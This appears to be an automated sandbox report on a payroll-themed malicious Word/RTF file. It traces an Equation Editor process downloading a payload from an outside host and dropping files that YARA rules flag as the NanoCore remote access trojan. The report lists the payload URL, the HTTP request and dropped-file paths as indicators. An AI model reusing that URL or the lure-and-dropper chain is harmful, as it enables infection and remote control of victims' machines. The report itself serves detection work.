      Source: EQNEDT32.EXE, 00000002.00000002.911909348.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lutanedukasi.co.id/wp-includes/jnstp.exejjC:
      Source: EQNEDT32.EXE, 00000002.00000003.909271531.000000000036D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000004.00000002.932811810.000000000040A000.00000004.00000001.01000000.00000004.sdmp, dll.exe, 00000004.00000000.911118896.000000000040A000.00000008.00000001.01000000.00000004.sdmp, jnstp[1].exe.2.dr, dll.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{70D846B3-DCAC-4A39-983B-1268AFAC60AA}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: lutanedukasi.co.id
      Source: global trafficHTTP traffic detected: GET /wp-includes/jnstp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lutanedukasi.co.idConnection: Keep-Alive
      Source: EQNEDT32.EXE, 00000002.00000003.909460483.0000000000342000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.909424895.0000000000334000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.912097543.0000000000343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: EQNEDT32.EXE, 00000002.00000003.909460483.0000000000342000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.909424895.0000000000334000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.912097543.0000000000343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
      Source: jqenyeo.exe, 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTR

      System Summary

      barindex
      Source: initial sampleStatic file information: Filename: Payslip_APR_2022.doc
      Source: Payslip_APR_2022.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.22819d4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.22819d4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jnstp[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\dll.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00406D5F
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_004031FA
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00409C02
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_0040A174
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00409690
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_0040777E
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_0040B3E1
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_0040C3AD
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00260BE0
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_0040AFF5
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F5B0D8
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F538C8
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F53020
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F52418
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F58808
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F59408
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F530E7
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_01F594CF
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_004031FA
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_00409C02
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_0040A174
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_00409690
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_0040777E
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_0040B3E1
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_0040C3AD
      Source: ~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\dll.exeMemory allocated: 77620000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\dll.exeMemory allocated: 77740000 page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory allocated: 77620000 page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory allocated: 77740000 page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory allocated: 77620000 page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory allocated: 77740000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeMemory allocated: 77620000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeMemory allocated: 77740000 page execute and read and write
      Source: Payslip_APR_2022.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
